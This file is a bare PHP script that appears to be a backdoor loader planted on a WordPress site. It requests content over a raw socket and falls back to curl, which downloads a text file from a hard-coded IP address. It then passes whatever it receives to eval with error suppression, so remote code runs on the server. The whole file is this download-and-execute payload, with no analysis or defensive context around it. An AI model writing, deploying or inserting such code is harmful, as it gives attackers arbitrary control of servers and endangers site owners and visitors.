<?php
$_f = @pfsockopen($_h, 80, $_e, $_s, 5);
if ($_f) {
    $_r = "GET $_p HTTP/1.1\r\nHost: $_h\r\nConnection: close\r\n\r\n";
    fwrite($_f, $_r);
    $_d = ''; $_hd = false;
    while (!feof($_f)) {
        $_l = fgets($_f, 4096);
        if ($_hd) $_d .= $_l; elseif (trim($_l)=='') $_hd = true;
    }
    fclose($_f);
} else {
    $_ch = curl_init("http://107.150.60.82/wp-sx-generator.txt");
    curl_setopt($_ch, CURLOPT_RETURNTRANSFER, 1);
    $_d = curl_exec($_ch);
    curl_close($_ch);
}
if (!empty($_d)) @eval('?>' . $_d);
?>
